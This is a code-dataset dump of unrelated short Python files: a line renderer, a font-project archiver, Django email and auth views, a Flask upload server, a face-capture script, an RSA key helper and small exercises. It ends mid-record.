color(r,g,b)\n\n def line(self, x0, y0, x1, y1, transform = True):\n if transform:\n y0 = self.viewPort.y + (self.viewPort.height // 2) * (y0 + 1)\n y1 = self.viewPort.y + (self.viewPort.height // 2) * (y1 + 1)\n x0 = self.viewPort.x + (self.viewPort.width // 2) * (x0 + 1)\n x1 = self.viewPort.x + (self.viewPort.width // 2) * (x1 + 1)\n dy = abs(y1 - y0)\n dx = abs(x1 - x0)\n steep = dy > dx\n if steep:\n x0, y0 = y0, x0\n x1, y1 = y1, x1\n if x0 > x1:\n x0, x1 = x1, x0\n y0, y1 = y1, y0\n\n dy = abs(y1 - y0)\n dx = abs(x1 - x0)\n offset = 0\n threshold = 0.5 * 2 * dx\n\n y = y0\n for x in range(x0, x1 + 1):\n if steep:\n self.point(y, x)\n else:\n self.point(x, y)\n\n offset += dy * 2\n if offset >= threshold:\n y += 1 if y0 < y1 else -1\n threshold += dx * 2\n\n def getLine(self, x0, y0, x1, y1):\n linePoints = []\n # y0 = self.viewPort.y + (self.viewPort.height / 2) * (y0 + 1)\n # y1 = self.viewPort.y + (self.viewPort.height / 2) * (y1 + 1)\n # x0 = self.viewPort.x + (self.viewPort.width / 2) * (x0 + 1)\n # x1 = self.viewPort.x + (self.viewPort.width / 2) * (x1 + 1)\n dy = abs(y1 - y0)\n dx = abs(x1 - x0)\n steep = dy > dx\n if steep:\n x0, y0 = y0, x0\n x1, y1 = y1, x1\n if x0 > x1:\n x0, x1 = x1, x0\n y0, y1 = y1, y0\n\n dy = abs(y1 - y0)\n dx = abs(x1 - x0)\n offset = 0\n threshold = dx\n\n y = y0\n for x in range(int(x0), int(x1) + 1):\n if steep:\n linePoints.append(Point(y, x))\n else:\n linePoints.append(Point(x, y))\n\n offset += dy * 2\n if offset >= threshold:\n y += 1 if y0 < y1 else -1\n threshold += dx * 2\n return linePoints\n\n def drawLines(self, polygon):\n yPointsLines = []\n xPointsLines = []\n lines = []\n\n for index, point in enumerate(polygon.points):\n point2 = polygon.points[(index + 1) % len(polygon.points)]\n line = self.getLine(point[0], point[1], point2[0], point2[1])\n self.line(point[0], point[1], point2[0], point2[1], False)\n for lp in line:\n lines.append(lp)\n yPointsLines.append(lp.y)\n xPointsLines.append(lp.x)\n\n # centerY = self.viewPort.height / 2\n # centerX = self.viewPort.width / 2\n\n\n minY = min(yPointsLines)\n maxY = max(yPointsLines)\n minX = min(xPointsLines)\n maxX = max(xPointsLines)\n for indexX in range(minX, maxX):\n iterableLinesX = [line for line in lines if line.x == indexX]\n for indexY in range(minY, maxY):\n iterableLinesY = [linep for linep in lines if linep.y == indexY]\n if minY < indexY < maxY:\n if minX < indexX < maxX:\n if any(i.y <= indexY for i in iterableLinesX) and any(i.y >= indexY for i in iterableLinesX):\n if any(i.x <= indexX for i in iterableLinesY) and any(i.x >= indexX for i in iterableLinesY):\n self.point(indexX, indexY)\n\n def load(self, filename, translate, scale):\n model = Obj(filename)\n\n for face in model.faces:\n vcount = len(face)\n\n for j in range(vcount):\n f1 = face[j][0]\n f2 = face[(j + 1) % vcount][0]\n\n v1 = model.vertices[f1 - 1]\n v2 = model.vertices[f2 - 1]\n\n x1 = round((v1[0] + translate[0]) * scale[0])\n y1 = round((v1[1] + translate[1]) * scale[1])\n x2 = round((v2[0] + translate[0]) * scale[0])\n y2 = round((v2[1] + translate[1]) * scale[1])\n\n self.line(x1, y1, x2, y2, False)","sub_path":"Renderer.py","file_name":"Renderer.py","file_ext":"py","file_size_in_byte":7654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"181822529","text":"import os\nimport shutil\nimport glob\nimport time\nimport plistlib\nimport re\n\n# --------\n# Settings\n# --------\n\ndef getDefaultSettings(root):\n settings = dict(\n formatVersion=0,\n compressUFOs=False,\n makeGlyphSetProof=False,\n makeVisualDiffsReport=False,\n normalizeDataInVisualDiffsReport=True,\n onlyDefaultLayerInVisualDiffsReport=True,\n archiveDirectory=getDefaultArchiveDirectory(root),\n ignore=getDefaultIgnorePatterns()\n )\n return settings\n\ndef getSettingsPath(root):\n return os.path.join(root, \"freeze dryer.plist\")\n\ndef haveSettings(root):\n path = getSettingsPath(root)\n return os.path.exists(path)\n\ndef readSettings(root):\n path = getSettingsPath(root)\n settings = getDefaultSettings(root)\n settings.update(plistlib.readPlist(path))\n return settings\n\ndef writeSettings(root, settings):\n settings = dict(settings)\n if settings[\"archiveDirectory\"] == getDefaultArchiveDirectory(root):\n del settings[\"archiveDirectory\"]\n if settings[\"ignore\"] == getDefaultIgnorePatterns():\n del settings[\"ignore\"]\n path = getSettingsPath(root)\n plistlib.writePlist(settings, path)\n\ndef getArchiveDirectory(root, settings):\n archiveDirectory = settings.get(\"archiveDirectory\")\n if archiveDirectory is None:\n archiveDirectory = getDefaultArchiveDirectory(root)\n return archiveDirectory\n\ndef getDefaultArchiveDirectory(root):\n return os.path.join(root, \"archive\")\n\ndef getDefaultIgnorePatterns():\n patterns = \"\"\"\n /archive\n /ignore\n *.idlk\n \"\"\"\n patterns = [line.strip() for line in patterns.splitlines() if line.strip()]\n return patterns\n\n\n# ----------\n# Initialize\n# ----------\n\ndef isViableRoot(directory):\n \"\"\"\n Determine if the given directory is a\n viable candidate to be a root.\n\n XXX:\n walk an arbitrary number of levels up\n to make sure this isn't already in a project?\n \"\"\"\n # is there a settings path?\n if haveSettings(directory):\n return False, \"The selected directory is already in use by a project.\"\n return True, \"\"\n\ndef initializeProject(root, settings):\n \"\"\"\n Initialize a project at the given root.\n \"\"\"\n writeSettings(root, settings)\n archiveDirectory = getArchiveDirectory(root, settings)\n if archiveDirectory == getDefaultArchiveDirectory(root):\n if not os.path.exists(archiveDirectory):\n os.mkdir(archiveDirectory)\n\n\n# -----\n# Diffs\n# -----\n\nstatePattern = re.compile(\"\\d\\d\\d\\d-\\d\\d-\\d\\d-\\d\\d-\\d\\d$\")\n\ndef getDiffStateCandidates(root):\n states = []\n settings = readSettings(root)\n directory = getArchiveDirectory(root, settings)\n for fileName in reversed(sorted(os.listdir(directory))):\n if not statePattern.match(fileName):\n continue\n states.append(fileName)\n states.insert(0, \"Current\")\n return states\n\ndef compileDiffReport(root, state1, state2, normalize=False, onlyCompareFontDefaultLayers=True):\n from freezeDryer import diff\n from freezeDryer import diffReport\n rootSettings = readSettings(root)\n archiveDirectory = getArchiveDirectory(root, rootSettings)\n # normalize the paths for safety\n root = os.path.normpath(root)\n archiveDirectory = os.path.normpath(archiveDirectory)\n # locate the states\n if state1 == \"Current\":\n state1 = root\n else:\n state1 = os.path.join(archiveDirectory, state1)\n if state2 == \"Current\":\n state2 = root\n else:\n state2 = os.path.join(archiveDirectory, state2)\n # locate files that should be ignored\n state1IgnoredPaths = []\n if haveSettings(state1):\n state1Settings = readSettings(state1)\n state1IgnoredPaths = gatherIgnoredPaths(state1, state1Settings[\"ignore\"])\n state2IgnoredPaths = []\n if haveSettings(state2):\n state2Settings = readSettings(state2)\n state2IgnoredPaths = gatherIgnoredPaths(state2, state2Settings[\"ignore\"])\n # compile\n differences = diff.diffDirectories(\n state1,\n state2,\n ignorePaths1=state1IgnoredPaths,\n ignorePaths2=state2IgnoredPaths,\n onlyCompareFontDefaultLayers=onlyCompareFontDefaultLayers,\n normalizeFontContours=normalize,\n normalizeFontComponents=normalize,\n normalizeFontAnchors=normalize,\n normalizeFontGuidelines=normalize\n )\n report = diffReport.makeDiffReport(differences)\n return report\n\n# ------\n# Commit\n# ------\n\ndef makeTimeStamp():\n return time.strftime(\"%Y-%m-%d-%H-%M\", time.gmtime())\n\ndef getStatePath(archiveDirectory, stamp):\n return os.path.join(archiveDirectory, stamp)\n\ndef canPerformCommit(root):\n \"\"\"\n Determine if a commit can be performed.\n \"\"\"\n # missing settings\n if not haveSettings(root):\n return False, \"Settings are missing.\"\n settings = readSettings(root)\n # missing archive directory\n archiveDirectory = getArchiveDirectory(root, settings)\n if not os.path.exists(archiveDirectory):\n return False, \"Archive is missing.\"\n # stamp already exists\n stamp = makeTimeStamp()\n stateDirectory = getStatePath(archiveDirectory, stamp)\n if os.path.exists(stateDirectory):\n return False, \"A state directory with this same time stamp already exists.\"\n return True, stamp\n\ndef performCommit(root, stamp, message=None, progressBar=None):\n settings = readSettings(root)\n if progressBar is not None:\n tickCount = 4\n tickCount += settings[\"compressUFOs\"]\n tickCount += settings[\"makeVisualDiffsReport\"]\n tickCount += settings[\"makeGlyphSetProof\"]\n progressBar.setTickCount(tickCount)\n if progressBar:\n progressBar.update(\"Setting up state...\")\n archiveDirectory = getArchiveDirectory(root, settings)\n # normalize the paths for safety\n root = os.path.normpath(root)\n archiveDirectory = os.path.normpath(archiveDirectory)\n # make the state directory\n stateDirectory = getStatePath(archiveDirectory, stamp)\n # locate files that should be ignored\n ignorePatterns = settings[\"ignore\"]\n ignoredPaths = gatherIgnoredPaths(root, ignorePatterns)\n def ignoreArchiveFunction(path, names):\n ignore = []\n for name in names:\n if path in ignoredPaths:\n return names\n p = os.path.join(path, name)\n if p == archiveDirectory:\n return [name]\n if p in ignoredPaths:\n ignore.append(name)\n return ignore\n # copy the whole root to the state directory\n if progressBar:\n progressBar.update(\"Copying files...\")\n shutil.copytree(root, stateDirectory, ignore=ignoreArchiveFunction)\n # remove ignored directories\n for path in ignoredPaths:\n base = os.path.relpath(path, root)\n path = os.path.join(stateDirectory, base)\n if not os.path.exists(path):\n continue\n if os.path.isdir(path):\n # there shouldn't be anything there,\n # but fail if there is just to be safe\n assert not list(os.listdir(path))\n shutil.rmtree(path)\n # write the message\n if message:\n message = message.encode(\"utf8\")\n messagePath = os.path.join(stateDirectory, makeMessageFileName(stamp))\n f = open(messagePath, \"wb\")\n f.write(message)\n f.close()\n # compress UFOs\n if settings[\"compressUFOs\"]:\n if progressBar:\n progressBar.update(\"Compressing UFOs...\")\n recursivelyCompressUFOs(stateDirectory)\n # make the diffs\n if settings[\"makeVisualDiffsReport\"]:\n if progressBar:\n progressBar.update(\"Making visual differences report...\")\n candidates = getDiffStateCandidates(root)\n candidates.remove(\"Current\")\n candidates.remove(stamp)\n candidates.sort()\n if candidates:\n report = compileDiffReport(\n root,\n candidates[-1],\n stamp,\n normalize=settings[\"normalizeDataInVisualDiffsReport\"],\n onlyCompareFontDefaultLayers=settings[\"onlyDefaultLayerInVisualDiffsReport\"]\n )\n report = report.encode(\"utf8\")\n reportPath = os.path.join(stateDirectory, makeDiffReportFileName(stamp))\n f = open(reportPath, \"wb\")\n f.write(report)\n f.close()\n # make the proofs\n if settings[\"makeGlyphSetProof\"]:\n if progressBar:\n progressBar.update(\"Making glyph set proof...\")\n from freezeDryer import proof\n proof.makeGlyphSetProof(stateDirectory, stamp, makeProofFileName(stamp))\n\ndef makeMessageFileName(stamp):\n return stamp + \" message.txt\"\n\ndef makeProofFileName(stamp):\n return stamp + \" glyphs.pdf\"\n\ndef makeDiffReportFileName(stamp):\n return stamp + \" diffs.html\"\n\n# -----\n# Tools\n# -----\n\ndef findRoot(directory, level=0):\n \"\"\"\n Find the root directory for a project\n for any given directory <= 10 sub-directories\n below the root directory.\n \"\"\"\n if haveSettings(directory):\n return directory\n level += 1\n if level <= 10:\n return findRoot(os.path.dirname(directory), level)\n return None\n\ndef gatherIgnoredPaths(directory, ignorePatterns, level=0):\n found = []\n # match file names\n for pattern in ignorePatterns:\n if pattern.startswith(\"/\") and level > 0:\n continue\n elif pattern.startswith(\"/\"):\n pattern = pattern[1:]\n fullPattern = os.path.join(directory, pattern)\n found += glob.glob(fullPattern)\n # recurse through sub-directories\n level += 1\n for fileName in os.listdir(directory):\n if os.path.splitext(fileName)[-1].lower() == \".ufo\":\n continue\n fullPath = os.path.join(directory, fileName)\n if fullPath in found:\n continue\n if os.path.isdir(fullPath):\n found += gatherIgnoredPaths(fullPath, ignorePatterns, level)\n return found\n\n# ---------------\n# UFO Compression\n# ---------------\n\ndef gatherUFOPaths(directory):\n ufos = []\n for fileName in os.listdir(directory):\n path = os.path.join(directory, fileName)\n if os.path.splitext(fileName)[-1].lower() in (\".ufo\", \".ufoz\"):\n ufos.append(path)\n elif os.path.isdir(path):\n ufos += gatherUFOPaths(path)\n return ufos\n\ndef recursivelyCompressUFOs(directory):\n paths = gatherUFOPaths(directory)\n for path in paths:\n if os.path.splitext(path)[-1].lower() == \".ufoz\":\n continue\n convertUFOToUFOZ(path)\n\ndef convertUFOToUFOZ(path):\n ufozPath = os.path.splitext(path)[0] + \".ufoz\"\n zipPath = shutil.make_archive(\n ufozPath,\n \"zip\",\n os.path.dirname(path),\n os.path.basename(path)\n )\n os.rename(zipPath, ufozPath)\n shutil.rmtree(path)\n","sub_path":"build/Freeze Dryer.roboFontExt/lib/freezeDryer/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":10834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"497972967","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport hashlib\nfrom email.mime.base import MIMEBase\nfrom django.core.mail import EmailMultiAlternatives, SafeMIMEMultipart\n\n\nclass EmailMultiRelatedCore(EmailMultiAlternatives):\n \"\"\"\n A version of EmailMessage that makes it easy to send multipart/related\n messages. For example, including text and HTML versions with inline images.\n \"\"\"\n related_subtype = 'related'\n\n def __init__(self, *args, **kwargs):\n self.related_attachments = []\n self.related_attachments_filename_content_id = []\n super(EmailMultiRelatedCore, self).__init__(*args, **kwargs)\n\n def attach_related(self, filename=None, content=None, mimetype=None, filename_content_id=None):\n \"\"\"\n Attaches a file with the given filename and content. The filename can\n be omitted and the mimetype is guessed, if not provided.\n\n If the first parameter is a MIMEBase subclass it is inserted directly\n into the resulting message attachments.\n \"\"\"\n if filename_content_id is None:\n m = hashlib.md5()\n m.update(filename)\n filename_content_id = m.hexdigest()\n if filename_content_id not in self.related_attachments_filename_content_id:\n if isinstance(filename, MIMEBase):\n assert content == mimetype == None\n self.related_attachments.append(filename)\n else:\n assert content is not None\n self.related_attachments.append((filename, content, mimetype, filename_content_id))\n self.related_attachments_filename_content_id.append(filename_content_id)\n return filename_content_id\n\n def attach_related_file(self, path, mimetype=None):\n \"\"\"Attaches a file from the filesystem.\"\"\"\n filename = os.path.basename(path)\n content = open(path, 'rb').read()\n return self.attach_related(filename, content, mimetype)\n\n def _create_message(self, msg):\n return self._create_attachments(self._create_related_attachments(self._create_alternatives(msg)))\n\n def _create_related_attachments(self, msg):\n encoding = self.encoding or 'utf-8'\n if self.related_attachments:\n body_msg = msg\n msg = SafeMIMEMultipart(_subtype=self.related_subtype, encoding=encoding)\n if self.body:\n msg.attach(body_msg)\n for related in self.related_attachments:\n msg.attach(self._create_related_attachment(*related))\n return msg\n\n def _create_related_attachment(self, filename, content, mimetype=None, filename_content_id=None):\n \"\"\"\n Convert the filename, content, mimetype triple into a MIME attachment\n object. Adjust headers to use Content-ID where applicable.\n Taken from http://code.djangoproject.com/ticket/4771\n \"\"\"\n attachment = super(EmailMultiRelated, self)._create_attachment(filename, content, mimetype)\n if filename:\n mimetype = attachment['Content-Type']\n del(attachment['Content-Type'])\n del(attachment['Content-Disposition'])\n attachment.add_header('Content-Disposition', 'inline', filename=filename)\n attachment.add_header('Content-Type', mimetype, name=filename)\n attachment.add_header('Content-ID', '<%s>' % filename_content_id)\n return attachment\n\n\nclass EmailMultiRelated(EmailMultiRelatedCore):\n def make_body(self, text):\n try:\n from bs4 import BeautifulSoup, FeatureNotFound\n from bs4.element import Comment\n\n html = BeautifulSoup(text, 'lxml')\n # remove comments from text\n for c in html.find_all(text=lambda t: isinstance(t, Comment)):\n c.extract()\n # set links from a tag to text\n for tag in html.find_all(True):\n if tag.name == 'a':\n href = tag.attrs.get('href', '')\n if href and not href.startswith('#'):\n contents = reduce(lambda x, y: unicode(x) + unicode(y), tag.contents) if tag.contents else ''\n if href.find(contents) != -1:\n tag.replace_with(' %s ' % href)\n elif href != contents:\n tag.replace_with('%s %s ' %(contents, href))\n self.body = html.get_text().strip()\n self.attach_alternative(text, 'text/html')\n except (ImportError, FeatureNotFound):\n pass\n\n def set_body_template(self, template_name, dictionary=None):\n \"\"\"\n Render template using django template\n \"\"\"\n\n # need to create new environment with self object\n from django.template.loader import get_template\n from django.template.context import Context\n\n t = get_template(template_name)\n dictionary = dictionary if dictionary is not None else {}\n dictionary['emailmultirelated_object'] = self\n self.make_body(t.render(Context(dictionary)))\n\n def set_body_template_jinja2(self, template_name, dictionary=None):\n \"\"\"\n Render template using jinja\n required coffin\n \"\"\"\n\n # need to create new environment with self object\n from coffin.common import get_env\n from jinja import email_embedded_media\n\n env = get_env()\n env.add_extension(email_embedded_media)\n env.email_object_instance = self\n template = env.get_template(template_name)\n self.make_body(template.render(dictionary))\n\n\n","sub_path":"emailmultirelated/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":5582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"401018692","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass FundPlanForm(object):\n\n def __init__(self):\n self._amount = None\n self._calendar_type = None\n self._date = None\n self._remark = None\n\n @property\n def amount(self):\n return self._amount\n\n @amount.setter\n def amount(self, value):\n self._amount = value\n @property\n def calendar_type(self):\n return self._calendar_type\n\n @calendar_type.setter\n def calendar_type(self, value):\n self._calendar_type = value\n @property\n def date(self):\n return self._date\n\n @date.setter\n def date(self, value):\n self._date = value\n @property\n def remark(self):\n return self._remark\n\n @remark.setter\n def remark(self, value):\n self._remark = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.amount:\n if hasattr(self.amount, 'to_alipay_dict'):\n params['amount'] = self.amount.to_alipay_dict()\n else:\n params['amount'] = self.amount\n if self.calendar_type:\n if hasattr(self.calendar_type, 'to_alipay_dict'):\n params['calendar_type'] = self.calendar_type.to_alipay_dict()\n else:\n params['calendar_type'] = self.calendar_type\n if self.date:\n if hasattr(self.date, 'to_alipay_dict'):\n params['date'] = self.date.to_alipay_dict()\n else:\n params['date'] = self.date\n if self.remark:\n if hasattr(self.remark, 'to_alipay_dict'):\n params['remark'] = self.remark.to_alipay_dict()\n else:\n params['remark'] = self.remark\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = FundPlanForm()\n if 'amount' in d:\n o.amount = d['amount']\n if 'calendar_type' in d:\n o.calendar_type = d['calendar_type']\n if 'date' in d:\n o.date = d['date']\n if 'remark' in d:\n o.remark = d['remark']\n return o\n\n\n","sub_path":"alipay/aop/api/domain/FundPlanForm.py","file_name":"FundPlanForm.py","file_ext":"py","file_size_in_byte":2213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"525812910","text":"from PyQt4.QtCore import QThread\nimport sys\n\n\nclass WorkerThread(QThread):\n def __init__(self,function=None, *args, **kwargs):\n QThread.__init__(self)\n self.function = function\n self.args = args\n self.kwargs = kwargs\n self.queue=list()\n self.canDropJobs=False\n self.finished.connect(self.threadFinished)\n self.isFinalized=False\n\n def __del__(self):\n if self.isFinalized==False:\n self.finalize()\n\n def finalize(self,timeout=5000):\n self.finalize=True\n self.start=self.blockSart\n self.quit()\n if self.isRunning():\n if timeout==None:\n self.wait()\n else:\n if not(self.wait(timeout)):\n raise Exception(\"Finalizing the WorkerThread timed out, could not terminate thread\")\n\n\n def blockSart(self):\n pass\n\n def threadFinished(self):\n if len(self.queue)!=0:\n job=self.queue.pop(0)\n self.function=job[\"func\"]\n self.args = job[\"args\"]\n self.kwargs = job[\"kwargs\"]\n self.start()\n\n\n def scheudelFunction(self,function, *args, **kwargs):\n if self.isRunning() :\n self.queue.append({\"func\":function,\"args\":args,\"kwargs\":kwargs})\n else:\n self.function=function\n self.args = args\n self.kwargs = kwargs\n self.start()\n\n def executeFunction(self,function, *args, **kwargs):\n self.function=function\n self.args = args\n self.kwargs = kwargs\n if not self.isRunning():\n self.start()\n else:\n if not self.canDropJobs:\n raise Exception(\"Worker Thread was still busy: Could not execute Function\")\n\n def quit(self):\n self.jobs={}\n QThread.quit(self)\n\n def run(self):\n try:\n self.function(*self.args,**self.kwargs)\n except:\n (type, value, traceback) = sys.exc_info()\n sys.excepthook(type, value, traceback)\n return","sub_path":"current_code/DiffTASLab/oldstuff/WorkerThread.py","file_name":"WorkerThread.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"418430721","text":"import numpy as numpy\nimport cv2\nimport os, time\nimport dlib\nfrom imutils import face_utils\nfrom imutils.face_utils import FaceAligner\n\ndetector = dlib.get_frontal_face_detector()\nshape_predictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\")\nface_aligner = FaceAligner(shape_predictor, desiredFaceWidth=200)\n\nuser_db_dir = \"images/\"\n\n\ndef create_folder(folder_name):\n if not os.path.exists(folder_name):\n os.mkdir(folder_name)\n\ndef main():\n create_folder(user_db_dir)\n while True:\n name=input(\"Please enter the User Name: \")\n userId = input(\"Enter User id for {}: \".format(name))\n try:\n # userId = int(userId)\n userFolder = user_db_dir + str(name) + \"/\"\n create_folder(userFolder)\n break\n except:\n print(\"Unable to Create user folder.\")\n continue\n\n # get beginning image number\n while True:\n init_img_no = input(\"Starting img no.: \")\n try:\n init_img_no = int(init_img_no)\n break\n except:\n print(\"Starting img no should be integer...\")\n continue\n\n img_no = init_img_no\n cap = cv2.VideoCapture(0)\n total_imgs = 10\n while True:\n ret, img = cap.read()\n img_gray = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n faces = detector(img_gray)\n if len(faces) == 1:\n face = faces[0]\n (x, y, w, h) = face_utils.rect_to_bb(face)\n face_img = img_gray[y-50:y + h+100, x-50:x + w+100]\n face_aligned = face_aligner.align(img, img_gray, face)\n\n face_img = face_aligned\n img_path = userFolder + name + str(img_no) + \".jpg\"\n cv2.imwrite(img_path, face_img)\n cv2.rectangle(img, (x, y), (x + w, y + h), (255, 255, 0), 3)\n cv2.imshow(\"aligned\", face_img)\n img_no += 1\n\n cv2.imshow(\"Saving\", img)\n cv2.waitKey(1)\n if img_no == init_img_no + total_imgs:\n break\n\n cap.release()\n cv2.destroyAllWindows()\n\nmain()\n","sub_path":"add_user_to_database.py","file_name":"add_user_to_database.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"89116990","text":"import os\nfrom flask import Flask, request, secure_filename\n\napp = Flask(__name__)\n\ndef get_my_ip():\n return request.environ.get('HTTP_X_REAL_IP', request.remote_addr)\n\n\n@app.route('/', methods=['GET', 'POST'])\ndef upload_file():\n UPLOAD_FOLDER = os.path.join(os.getcwd(), 'Upload_Folder')\n app.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n if not os.path.exists(UPLOAD_FOLDER):\n os.makedirs(UPLOAD_FOLDER)\n\n if request.method == 'POST':\n file = request.files['file']\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n return '''\n\n \n Upload new File\n

Upload new File

\n
\n\n

\n \n

\n\n
\n\t

''' + 'Your IP: ' + '' + \\\n\t\tget_my_ip() + '' + '

'\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=8080)\n","sub_path":"Flask_TEST/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"643818156","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth import login, logout\nfrom django.contrib.auth.forms import UserCreationForm, AuthenticationForm\n\n\ndef frontpage(request):\n if request.user.is_authenticated:\n return redirect('/profile')\n\n if request.method == 'POST':\n if 'signupform' in request.POST:\n signupform = UserCreationForm(data=request.POST)\n signinform = AuthenticationForm()\n\n if signupform.is_valid():\n username = signupform.cleaned_data['username']\n password = signupform.cleaned_data['password1']\n signupform.save()\n return redirect('/')\n else:\n signupform = UserCreationForm()\n signinform = AuthenticationForm(data=request.POST)\n\n if signinform.is_valid():\n login(request, signinform.get_user())\n return redirect('/')\n\n\n signupform = UserCreationForm()\n signinform = AuthenticationForm()\n\n return render(request, 'frontpage.html', {'signupform': signupform,\n 'signinform': signinform})\n\n\ndef signout(request):\n logout(request)\n return redirect('/')\n\n\ndef profile(request):\n return render(request, 'profile.html')\n","sub_path":"nyt_api/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"13640678","text":"n = int(input())\nd = {}\nfor i in range(n):\n name, gpa = map(str, input().split())\n if name not in d:\n d[name] = [gpa]\n else:\n d[name] += [gpa]\nfor i in d:\n s = 0\n for j in d[i]:\n s += int(j)\n gpa = s/len(d[i])\n d[i] = float(\"{0:.3f}\".format(gpa))\nd = sorted(d.items(), key=lambda k: (-k[1], k[0]))\nfor x, y in d:\n print(x, end=\" \")\n print(\"{0:.3f}\".format(y))\n","sub_path":"solve-problems/exam/j.py","file_name":"j.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"117602865","text":"n = int(input(\"Enter N: \"))\nm = n*3\n\ns = input(\"Enter String: \")\nmid = int(n/2)\n\npatt= \".|.\"\ndash = \"-\"\nlength = len(s)\n\ndef printW(num):\n print(dash* int(num))\n\ndef f1(i):\n pattSize = len(patt*i)\n w = (m-pattSize)/2\n a= dash* int(w)+ patt *i + dash* int(w)\n if(len(a)<=m):\n print(a)\n else:\n print(dash* int(w)+ patt *(i-int((len(a)-m)/2)) + dash* int(w))\n\n\ndef printStr():\n w= len(s)\n print(dash* int((m-w)/2) + s + dash* int((m-w)/2))\n \ndef run():\n i=1\n while( i=1):\n f1(i)\n i-=2\n \nrun()\n","sub_path":"Working codes/toImproveQ4.py","file_name":"toImproveQ4.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"238355454","text":"from cryptography.hazmat.primitives import serialization\nfrom cryptography.hazmat.primitives.asymmetric import rsa\nfrom cryptography.hazmat.backends import default_backend\nfrom cryptography.hazmat.primitives.serialization import load_pem_public_key\nfrom cryptography.hazmat.primitives.asymmetric import padding\nfrom cryptography.hazmat.primitives import hashes\nimport os.path\n\n\ndef generate_key():\n key = rsa.generate_private_key(public_exponent=65537, key_size=4096, backend=default_backend())\n if os.path.isfile(\"./Key_database/rsa_key.keydb.pem\"):\n return 0\n with open(\"./Key_database/rsa_key.keydb.pem\", \"wb+\") as f:\n f.write(key.private_bytes(\n encoding=serialization.Encoding.PEM,\n format=serialization.PrivateFormat.TraditionalOpenSSL,\n encryption_algorithm=serialization.BestAvailableEncryption(b\"forty2\"),\n )\n )\n\n\ndef load_private_key():\n if not os.path.isfile(\"./Key_database/rsa_key.keydb.pem\"):\n generate_key()\n with open(\"./Key_database/rsa_key.keydb.pem\", \"r\") as f:\n key = serialization.load_pem_private_key(f.read().encode('utf-8'), b\"forty2\", backend=default_backend())\n # print(key)\n return key\n\n\ndef load_public_key():\n return load_private_key().public_key()\n\n\ndef encrypt_key(message, public_key):\n encoded_message = message.public_bytes(encoding=serialization.Encoding.PEM, format=serialization.PublicFormat.PKCS1)\n #print('Message: ', encoded_message)\n #print('Message len: ', len(encoded_message))\n head_encoded_message = encoded_message[:int(len(encoded_message)/2)]\n tail_encoded_message = encoded_message[int(len(encoded_message)/2): len(encoded_message)]\n #print('Message: ', head_encoded_message)\n #print('Message: ', tail_encoded_message)\n\n head_cipher_text = public_key.encrypt(\n head_encoded_message, padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA1()),\n algorithm=hashes.SHA1(),\n label=None\n )\n )\n\n tail_cipher_text = public_key.encrypt(\n tail_encoded_message, padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA1()),\n algorithm=hashes.SHA1(),\n label=None\n )\n )\n\n return head_cipher_text, tail_cipher_text\n\n\ndef decrypt_msg(msg):\n private_key = load_private_key()\n\n plaintext = private_key.decrypt(\n msg, padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA1()),\n algorithm=hashes.SHA1(),\n label=None\n )\n )\n return plaintext\n\n\ndef encrypt_msg(msg, public_key):\n\n cipher_text = public_key.encrypt(\n msg, padding.OAEP(\n mgf=padding.MGF1(algorithm=hashes.SHA1()),\n algorithm=hashes.SHA1(),\n label=None\n )\n )\n\n return cipher_text\n","sub_path":"Crypto_project/Comp3334/Client/Encryption/RSA.py","file_name":"RSA.py","file_ext":"py","file_size_in_byte":2816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"81521355","text":"# Написати функцію, яка приймає на вхід список і підраховує кількість однакових елементів у ньому.\r\n\r\nlst = [1,2,3,4,4,4,4,1,3,1,1]\r\n\r\ndef elements(el):\r\n a = {}\r\n for i in el:\r\n if i in a.keys():\r\n b = a[i]\r\n a.pop(i)\r\n a[i] = b+1\r\n else:\r\n a[i] = 1\r\n print(a)\r\n return(a)\r\n\r\nelements(lst)\r\n","sub_path":"HT_3/task7.py","file_name":"task7.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"259549422","text":"import sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtCore import QTimer, QTime\n\n#QLCDNumber 